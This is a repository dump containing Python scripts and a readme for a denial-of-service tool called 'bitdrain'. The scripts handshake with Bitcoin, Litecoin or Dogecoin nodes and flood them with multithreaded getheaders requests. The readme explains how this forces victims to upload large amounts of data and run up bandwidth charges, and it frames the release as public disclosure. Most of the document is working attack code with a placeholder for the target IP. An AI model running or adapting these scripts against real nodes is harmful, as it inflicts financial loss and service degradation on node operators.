114 |     start_hash = binascii.unhexlify("82bc68038f6034c0596b6e313729793a887fded6e92a31fbdf70863f89d9bea2")[::-1]
115 |     stop_hash = binascii.unhexlify("a4f5e07dfe69ce652866a496a1f15f1fdf1d8d20ab3a6eb6c13aaf6d379ba594")[::-1]
116 |     return struct.pack('<L', version) + struct.pack('<B', num_hashes) + start_hash + stop_hash
117 | 
118 | def process_headers(payload):
119 |     headers_data = BytesIO(payload)
120 |     num_headers = struct.unpack('<B', headers_data.read(1))[0]
121 |     headers = []
122 |     for _ in range(num_headers):
123 |         header = headers_data.read(80)
124 |         if len(header) < 80:
125 |             break
126 |         headers.append(header)
127 |     return headers
128 | 
129 | def print_headers(headers):
130 |     for header in headers:
131 |         break
132 | 
133 | def main(thread_num):
134 |     s = create_socket()
135 | 
136 |     version_payload = create_version_payload()
137 |     send_message(s, "version", version_payload)
138 | 
139 |     command, payload = recv_message(s, thread_num)
140 |     if command != "version":
141 |         print(f"debug: waiting ...")
142 |         sys.exit(1)
143 | 
144 |     send_message(s, "verack", b'')
145 | 
146 |     while True:
147 |         getheaders_payload = create_getheaders_payload()
148 |         send_message(s, "getheaders", getheaders_payload)
149 | 
150 |         try:
151 |             command, payload = recv_message(s, thread_num)
152 |             if command != "headers":
153 |                 raise Exception(f"did not receive headers message on socket {s}")
154 |         except Exception as e:
155 |             continue
156 | 
157 |         headers = process_headers(payload)
158 |         print_headers(headers)
159 | 
160 | if __name__ == "__main__":
161 |     try:
162 |         print_with_scroll_effect(lines)
163 |         num_threads = int(input("enter amount of parallel threads: "))
164 |         with ThreadPoolExecutor(max_workers=num_threads) as executor:
165 |             for i in range(num_threads):
166 |                 executor.submit(main, i)
167 |     except KeyboardInterrupt:
168 |         print("\nquit")
169 |         sys.exit(0)
170 | 


--------------------------------------------------------------------------------
/drain-ltc.py:
--------------------------------------------------------------------------------
  1 | import sys
  2 | import socket
  3 | import struct
  4 | import time
  5 | import hashlib
  6 | import binascii
  7 | import os
  8 | from io import BytesIO
  9 | from concurrent.futures import ThreadPoolExecutor
 10 | import time
 11 | from colorama import init
 12 | 
 13 | init()
 14 | 
 15 | NODE_NETWORK = 1
 16 | total_mb_received = 0
 17 | 
 18 | def create_socket():
 19 |     s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
 20 |     s.connect(("PUT-YOUR-NODE-IP-HERE", 9333))
 21 |     return s
 22 | 
 23 | ascii = '''
 24 | ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣀⣠⣤⣴⣶⣶⣿⣿⣿⣿⣿⣿⣿⣿⣶⣶⣶⣤⣄⣀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
 25 | ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢀⣠⣴⣾⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣷⣦⣄⡀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
 26 | ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢀⣤⣾⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣷⣤⡀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
 27 | ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣠⣾⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣷⣄⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
 28 | ⠀⠀⠀⠀⠀⠀⠀⠀⣠⣾⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣷⣄⠀⠀⠀⠀⠀⠀⠀⠀
 29 | ⠀⠀⠀⠀⠀⠀⣠⣾⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⡏⠉⠛⠛⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣷⣄⠀⠀⠀⠀⠀⠀
 30 | ⠀⠀⠀⠀⠀⣴⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⠁⠀⠀⢰⣿⣿⠇⠀⠉⠉⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣦⠀⠀⠀⠀⠀
 31 | ⠀⠀⠀⢀⣾⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⡏⠉⠉⠛⠛⠿⠿⡏⠀⠀⠀⣾⣿⡿⠀⠀⠀⣸⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣷⡀⠀⠀⠀
 32 | ⠀⠀⢀⣾⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⠁⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠙⠛⠃⠀⠀⢀⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣷⡀⠀⠀
 33 | ⠀⠀⣾⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣶⣆⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠉⠛⠻⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣷⠀⠀
 34 | ⠀⣸⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⡏⠀⠀⠀⠀⠀⢠⣶⣦⣤⣀⡀⠀⠀⠀⠀⠀⠀⠙⢿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣇⠀
 35 | ⢀⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⠁⠀⠀⠀⠀⠀⣼⣿⣿⣿⣿⣿⣷⡄⠀⠀⠀⠀⠀⠈⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⡄
 36 | ⢸⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⡏⠀⠀⠀⠀⠀⢠⣿⣿⣿⣿⣿⣿⣿⡿⠀⠀⠀⠀⠀⠀⣸⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⡇
 37 | ⣾⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⠁⠀⠀⠀⠀⠀⠘⠿⠿⢿⣿⣿⡿⠟⠁⠀⠀⠀⠀⠀⢀⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿
 38 | ⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⡏⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣠⣾⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿
 39 | ⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⠁⠀⠀⠀⠀⠀⣴⣶⣤⣤⣀⡀⠀⠀⠀⠀⠀⠀⠐⠿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿
 40 | ⢿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⡏⠀⠀⠀⠀⠀⢠⣿⣿⣿⣿⣿⣿⣷⣦⡀⠀⠀⠀⠀⠀⠘⢿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿
 41 | ⢸⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⠿⠿⢿⡿⠁⠀⠀⠀⠀⠀⣼⣿⣿⣿⣿⣿⣿⣿⣿⣧⠀⠀⠀⠀⠀⠀⢸⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⡇
 42 | ⠈⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⠏⠀⠀⠀⠀⠀⠀⠀⠀⠀⠠⣿⣿⣿⣿⣿⣿⣿⣿⣿⠇⠀⠀⠀⠀⠀⠀⢸⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⠃
 43 | ⠀⢹⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣯⣄⣀⡀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠈⠉⠉⠉⠉⠉⠀⠀⠀⠀⠀⠀⠀⢠⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⡏⠀
 44 | ⠀⠀⢿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣶⠀⠀⠀⢀⡀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣠⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⡿⠀⠀
 45 | ⠀⠀⠈⢿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⡏⠀⠀⠀⣾⣿⣿⠀⠀⠀⢠⣤⣄⣀⣀⣀⣀⣤⣴⣾⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⡿⠁⠀⠀
 46 | ⠀⠀⠀⠈⢿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⠁⠀⠀⢰⣿⣿⡇⠀⠀⢀⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⡿⠁⠀⠀⠀
 47 | ⠀⠀⠀⠀⠀⠻⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣷⣶⣦⣾⣿⣿⡀⠀⠀⢸⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⠟⠀⠀⠀⠀⠀
 48 | ⠀⠀⠀⠀⠀⠀⠙⢿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣷⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⡿⠋⠀⠀⠀⠀⠀⠀
 49 | ⠀⠀⠀⠀⠀⠀⠀⠀⠙⢿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⡿⠋⠀⠀⠀⠀⠀⠀⠀⠀
 50 | ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠙⢿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⡿⠋⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
 51 | ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠈⠛⢿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⡿⠛⠁⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
 52 | ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠈⠙⠻⢿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⡿⠟⠋⠁⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
 53 | ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠉⠙⠛⠻⠿⠿⢿⣿⣿⣿⣿⣿⣿⡿⠿⠿⠟⠛⠋⠉⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
 54 | 
 55 | 
 56 |       remote dogecoin/bitcoin/etc. bandwidth/cpu drainer
 57 |       kevin mcsheehan (pad) april 2023 - twitter: @123456
 58 | '''
 59 | 
 60 | lines = ascii.split("\n")
 61 | 
 62 | def print_with_scroll_effect(lines):
 63 |     for line in lines:
 64 |         print(line)
 65 |         time.sleep(0.01)
 66 | 
 67 | def create_version_payload():
 68 |     version = 70002
 69 |     services = NODE_NETWORK
 70 |     timestamp = int(time.time())
 71 |     addr_recv = struct.pack('<Q16s', services, b'\x00' * 16)
 72 |     addr_from = struct.pack('<Q16s', services, b'\x00' * 16)
 73 |     nonce = 0
 74 |     user_agent = b'1'
 75 |     user_agent_length = len(user_agent)
 76 |     user_agent_length_compact = user_agent_length.to_bytes((user_agent_length.bit_length() + 7) // 8, 'little')
 77 |     start_height = 0
 78 |     relay = 1
 79 |     return struct.pack('<LQQ26s26sQ', version, services, timestamp, addr_recv, addr_from, nonce) + user_agent_length_compact + user_agent + struct.pack('<L?', start_height, relay)
 80 | 
 81 | def send_message(s, command, payload):
 82 |     magic = 0xdbb6c0fb
 83 |     command = command.encode('utf-8') + b'\x00' * (12 - len(command))
 84 |     length = len(payload)
 85 |     checksum = hashlib.sha256(hashlib.sha256(payload).digest()).digest()[:4]
 86 |     try:
 87 |         s.send(struct.pack('<L12sL4s', magic, command, length, checksum) + payload)
 88 |     except BrokenPipeError:
 89 |         time.sleep(0.00001)
 90 | 
 91 | def recv_message(s, thread_num):
 92 |     global total_mb_received
 93 |     magic, command, length, checksum = 0, b'', 0, b''
 94 |     try:
 95 |         magic, command, length, checksum = struct.unpack('<L12sL4s', s.recv(24))
 96 |     except struct.error:
 97 |         pass
 98 |     command = command.strip(b'\x00').decode('utf-8')
 99 |     payload = b''
100 |     while len(payload) < length:
101 |         chunk = s.recv(length - len(payload))
102 |         if not chunk:
103 |             break
104 |         payload += chunk
105 |     hex_payload = binascii.hexlify(payload[:50]).decode()
106 |     total_mb_received += len(payload) / (1024 * 1024)
107 |     print(f"[{thread_num}] {hex_payload} - {len(payload) / (1024 * 1024):.2f} MB - total: {total_mb_received:.2f} MB")
108 |     return command, payload
109 | 
110 | def create_getheaders_payload(num_headers=1999):
111 |     version = 70002
112 |     num_hashes = 1
113 |     start_hash = binascii.unhexlify("80ca095ed10b02e53d769eb6eaf92cd04e9e0759e5be4a8477b42911ba49c78f")[::-1]
114 |     stop_hash = binascii.unhexlify("7f30bdedc9f02862e5889c8fbebdaddee2a97815f9079c02055519e7a31c48bf")[::-1]
115 |     return struct.pack('<L', version) + struct.pack('<B', num_hashes) + start_hash + stop_hash
116 | 
117 | def process_headers(payload):
118 |     headers_data = BytesIO(payload)
119 |     num_headers = struct.unpack('<B', headers_data.read(1))[0]
120 |     headers = []
121 |     for _ in range(num_headers):
122 |         header = headers_data.read(80)
123 |         if len(header) < 80:
124 |             break
125 |         headers.append(header)
126 |     return headers
127 | 
128 | def print_headers(headers):
129 |     for header in headers:
130 |         break
131 | 
132 | def main(thread_num):
133 |     s = create_socket()
134 | 
135 |     version_payload = create_version_payload()
136 |     send_message(s, "version", version_payload)
137 | 
138 |     command, payload = recv_message(s, thread_num)
139 |     if command != "version":
140 |         print(f"debug: waiting ...")
141 |         sys.exit(1)
142 | 
143 |     send_message(s, "verack", b'')
144 | 
145 |     while True:
146 |         getheaders_payload = create_getheaders_payload()
147 |         send_message(s, "getheaders", getheaders_payload)
148 | 
149 |         try:
150 |             command, payload = recv_message(s, thread_num)
151 |             if command != "headers":
152 |                 raise Exception(f"did not receive headers message on socket {s}")
153 |         except Exception as e:
154 |             continue
155 | 
156 |         headers = process_headers(payload)
157 |         print_headers(headers)
158 | 
159 | if __name__ == "__main__":
160 |     try:
161 |         print_with_scroll_effect(lines)
162 |         num_threads = int(input("enter amount of parallel threads: "))
163 |         with ThreadPoolExecutor(max_workers=num_threads) as executor:
164 |             for i in range(num_threads):
165 |                 executor.submit(main, i)
166 |     except KeyboardInterrupt:
167 |         print("\nquit")
168 |         sys.exit(0)
169 | 


--------------------------------------------------------------------------------
/readme.md:
--------------------------------------------------------------------------------
 1 | # bitdrain - bitcoin cpu/mem dos/crash and $ attack
 2 | remote p2p cpu/mem and upstream financial attack against bitcoin, dogecoin, etc.
 3 | 
 4 | github issue https://github.com/dogecoin/dogecoin/issues/3243
 5 | 
 6 | by using `drain-doge.py`, `drain-btc.py` and `drain-ltc.py` we can force dogecoin/bitcoin/litecoin/fork nodes to upload unlimited data to an attacking machine - which caps out, throttles and in many cases charges overuse fees on upstream - making this a financial attack against bitcoin and its forks. certain protocol messages aren't rate limited and can be used to remotely overwhelm a server's upstream in a financially damaging way.
 7 | 
 8 | # asciinema
 9 | [![asciicast](https://asciinema.org/a/577193.svg)](https://asciinema.org/a/577193)
10 | 
11 | # dogecoin issue report
12 | 
13 | there is a remote attack that can be carried out in perpetuity against vulnerable nodes in a way that a single attacking machine can force `dogecoind` to upload > 130MB/s to the attacking machine in a sustained way.
14 | 
15 | doge nodes on isps or cloud providers that charge for or throttle upstream after a cap has been reached are, unless hardened against this attack at a server level, vulnerable to the attack.
16 | 
17 | i did some testing and ran my digitalocean bandwidth costs to > $175 relatively quickly.
18 | 
19 | ![image](https://user-images.githubusercontent.com/38997186/229753562-079d844f-8b82-4d23-9fd8-56fc6bcca3d7.png)
20 | 
21 | making this a financial attack against vulnerable nodes - but not an attack capable of taking the network offline.
22 | 
23 | the attack is carried out by an [evil multithreaded script](https://github.com/visualbasic6/drain) that pretends to be several valid nodes. this is accomplished by operating in the network at a low p2p protocol level. after performing a complete handshake with the target node, resulting in a healthy peer connection, the script begins to request protocol message content in a loop. at this point a single attacking machine can trigger, again, `dogecoind` into sending > 130MB/s worth of data. additionally - with code alterations it is likely that the evil script could target multiple dogecoin nodes simultaneously, from one machine, assuming that certain conditions are met on the attacker's end.
24 | 
25 | i can't find a bug bounty program so i'm just posting it here. it's not really the exploit of the century so i'm not concerned with evil actors carrying out bandwidth attacks against their enemies. that said - still - [get that fixed](https://youtube.com/watch?v=BU3tDES29sY&t=143s).
26 | 
27 | bitcoin and litecoin are also vulnerable to the attack.
28 | 
29 | but blockstream (skids) and their approved programmers (skids) are ants at a picnic when it comes to irresponsible public disclosure. i'd like to think that, at least here in the doge community, we like to have a bit of fun and [do a little trolling](https://youtu.be/PobQzVsj7GE?t=4).
30 | 
31 | thank you for your immediate attention to this matter.
32 | 
33 | [pad](https://twitter.com/123456)
34 | 


--------------------------------------------------------------------------------